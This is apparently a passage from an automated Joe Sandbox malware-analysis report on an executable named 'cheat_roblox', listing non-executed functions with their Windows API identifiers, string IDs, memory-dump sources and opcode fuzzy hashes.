                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                              • Instruction ID: 4f0e2c99d8af1311f4c7346abd9a49c373cc1012d9e705cc78f6c3d5b63a2f13
                                                                              • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                              • Instruction Fuzzy Hash: 26C08C20F05602C1EA189B26C8CB11923ACFB40B08B614076C20CE1130CE2DC8EA9349

                                                                              Non-executed Functions

                                                                              Function 00007FF693E5C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                              • API String ID: 2659423929-3508440684
                                                                              • Opcode ID: 58b1de9f04650da3a7d44ba51163ba8a1ddb0a7ff3a84d81a8b9d40fd4fd1432
                                                                              • Instruction ID: 48d8f389e9ff71dab9f1449f730103ff909b7dfd7a315a5869819d4ae718ef17
                                                                              • Opcode Fuzzy Hash: 58b1de9f04650da3a7d44ba51163ba8a1ddb0a7ff3a84d81a8b9d40fd4fd1432
                                                                              • Instruction Fuzzy Hash: AF62E066F0864285FF20DB74D4562BD2369EB857A8F104273DA2DE7AE6DF38E585C300
                                                                              Function 00007FF693E6F180 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                              • String ID: %ls$%s: %s
                                                                              • API String ID: 2539828978-2259941744
                                                                              • Opcode ID: 6623834c6ca9731efd334e76f2f7c4d48775863e17bd3527b859c843ee7b3cd4
                                                                              • Instruction ID: afef1481c36e06436d69b0ee100b41c11cb833ec73c2b8adcec13454c9bc0ba8
                                                                              • Opcode Fuzzy Hash: 6623834c6ca9731efd334e76f2f7c4d48775863e17bd3527b859c843ee7b3cd4
                                                                              • Instruction Fuzzy Hash: 6CB29A62E1868281EE309B25D4562BE6369FFD57D4F104277E79EA37EAEE2CD540C300
                                                                              Function 00007FF693E92550 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfomemcpy_s
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                              • API String ID: 1759834784-2761157908
                                                                              • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                              • Instruction ID: 306c8a1e9b45cd18d8e843449408dd3262bca4f2dcd1c2cbaf9d08aebaab9127
                                                                              • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                              • Instruction Fuzzy Hash: EEB2E972E081868BEB7ACE69D4417FD37A9FB44788F505176DA0AB7B84DF38E5048B40
                                                                              Function 00007FF693E61A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                              • String ID: rtmp
                                                                              • API String ID: 3587137053-870060881
                                                                              • Opcode ID: 95fd495c96588198a5e03d902ada1db168ea9de9ecec27f1500150cb6c79cd49
                                                                              • Instruction ID: e595a40c700b60ee1d1256e67acbb53d424f934171d09c2883e18e0db337c252
                                                                              • Opcode Fuzzy Hash: 95fd495c96588198a5e03d902ada1db168ea9de9ecec27f1500150cb6c79cd49
                                                                              • Instruction Fuzzy Hash: 4AF1C222B08A8285EF20CB65D4821BD7769EB857C8F501573EB4DE7AAADF3CD584C740
                                                                              Function 00007FF693E65B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1693479884-0
                                                                              • Opcode ID: 13b57053c9edb0f691e6564e78418f78cd1dc0b326f339559e8595bdf58b92da
                                                                              • Instruction ID: dfcadd7d73e450a1ee3225c60cfd632a0588ee7ac7f860401d4cae60241390f1
                                                                              • Opcode Fuzzy Hash: 13b57053c9edb0f691e6564e78418f78cd1dc0b326f339559e8595bdf58b92da
                                                                              • Instruction Fuzzy Hash: B9A1A162F15A5284FE20CB79884A1BD3365EB85BA8B145276DF2DA7BD9DE3CE0418304
                                                                              Function 00007FF693E83170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 3140674995-0
                                                                              • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                              • Instruction ID: 5b538e1a42c487562119573600a8071d1029f40ae1c2aff05e66ee1c939b64cb
                                                                              • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                              • Instruction Fuzzy Hash: 86315076A08B819AEB70CF60E8513ED7368FB88744F44447ADA4D97B99EF38D548C710
                                                                              Function 00007FF693E876D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 1239891234-0
                                                                              • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                              • Instruction ID: 34e9dd237f708345043cc61280113ad703e412821d855f9a52610b0bcb22f6fc
                                                                              • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                                              • Instruction Fuzzy Hash: 2C318436A08B8195EB70CF25E8412EE73A8FB88754F540136EA8D93B59DF3CD545CB00
                                                                              Function 00007FF693E51AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: f9bf03e1b13c0b4c6c7d934612849e6fccaf4440e8589cb7471eab4968075207
                                                                              • Instruction ID: 74fc8a5598256d8687f27c08884cf4a42ae0434f68a25fb2505cf940abacb2b3
                                                                              • Opcode Fuzzy Hash: f9bf03e1b13c0b4c6c7d934612849e6fccaf4440e8589cb7471eab4968075207
                                                                              • Instruction Fuzzy Hash: C7B1BF62B14B8686EF209B65D8462ED2365FF85798F405272EA4DE7BDADF3CE540C300
                                                                              Function 00007FF693E8FA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF693E8FAC4
                                                                                • Part of subcall function 00007FF693E87934: GetCurrentProcess.KERNEL32(00007FF693E90CCD), ref: 00007FF693E87961
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                              • String ID: *?$.
                                                                              • API String ID: 2518042432-3972193922
                                                                              • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                              • Instruction ID: bc04d5308889546371c901f959cf5b99574c348b02e5d670d3a7d9b35ed24e96
                                                                              • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                                              • Instruction Fuzzy Hash: 4A51E362F14B9585EF21DFA6A8120F963A8FB48BD8B444573DE1DA7B85EE3CD4428300
                                                                              Function 00007FF693E92080 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1502251526-0
                                                                              • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                              • Instruction ID: fd16461f77c9f62e05ddb885a48bddbf4ba9594e3a302bc298e3c9b41079e533
                                                                              • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                              • Instruction Fuzzy Hash: F2D1A232B1968A87DB38CF15A1856BAB7A5F798784F148135DB4EA7B44DF3CE8418B00
                                                                              Function 00007FF693E5B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                              • String ID:
                                                                              • API String ID: 1365068426-0
                                                                              • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                              • Instruction ID: 864048d499d2005b856985cdd0321cdc2ae03a52d551ebde0847cfa930660c46
                                                                              • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                                                                              • Instruction Fuzzy Hash: 2701127560C74682EB209F22B85227A6399FB89BC0F484176EA8DD7B55CF3CD515C704
                                                                              Function 00007FF693E8FCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .
                                                                              • API String ID: 0-248832578
                                                                              • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                              • Instruction ID: a1ddc353e12eacdfabf4dccbc9bd4ecb9f84402d141f7b5df8731a5de578cc9a
                                                                              • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                                                                              • Instruction Fuzzy Hash: 22310922F0869545FB309A36A8067B96A95EB94FE4F148376DE5C97BD5CE3CD5028300
                                                                              Function 00007FF693E95AF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise_clrfp
                                                                              • String ID:
                                                                              • API String ID: 15204871-0
                                                                              • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                              • Instruction ID: 116cc04b9fc9aa45ebf623dd48e32ff340ac59fc4bbb66aa0a9b85285b3f5ea7
                                                                              • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                              • Instruction Fuzzy Hash: 6DB14A73604B89CBEB25CF29C84636D3BA4F784B48F198962DA5D97BA4CF39D451C700
                                                                              Function 00007FF693E78DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectRelease$CapsDevice
                                                                              • String ID:
                                                                              • API String ID: 1061551593-0
                                                                              • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                              • Instruction ID: 17aedfc80d84e62e81b52074c4892bf8608c34cbe93b788665ee78e945fbe09a
                                                                              • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                              • Instruction Fuzzy Hash: D3810D36B18A0986EB20CF6AE84266D7775FB84B88F004173DE0EA7764DF39D549C740
                                                                              Function 00007FF693E7A2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FormatInfoLocaleNumber
                                                                              • String ID:
                                                                              • API String ID: 2169056816-0
                                                                              • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                              • Instruction ID: 4223e95d0d1283ee0c912c7a5bc4f7fb9ac5d24c9846490541bdb45100c99045
                                                                              • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                              • Instruction Fuzzy Hash: E3119D32A08B8595E7718F21E4013EA73B8FF88B84F844072DA8DA7A64DF3CE545C744
                                                                              Function 00007FF693E6126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E624C0: CreateFileW.KERNELBASE ref: 00007FF693E6259B
                                                                                • Part of subcall function 00007FF693E624C0: GetLastError.KERNEL32 ref: 00007FF693E625AE
                                                                                • Part of subcall function 00007FF693E624C0: CreateFileW.KERNEL32 ref: 00007FF693E6260E
                                                                                • Part of subcall function 00007FF693E624C0: GetLastError.KERNEL32 ref: 00007FF693E62617
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E615D0
                                                                                • Part of subcall function 00007FF693E63980: MoveFileW.KERNEL32 ref: 00007FF693E639BD
                                                                                • Part of subcall function 00007FF693E63980: MoveFileW.KERNEL32 ref: 00007FF693E63A34
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
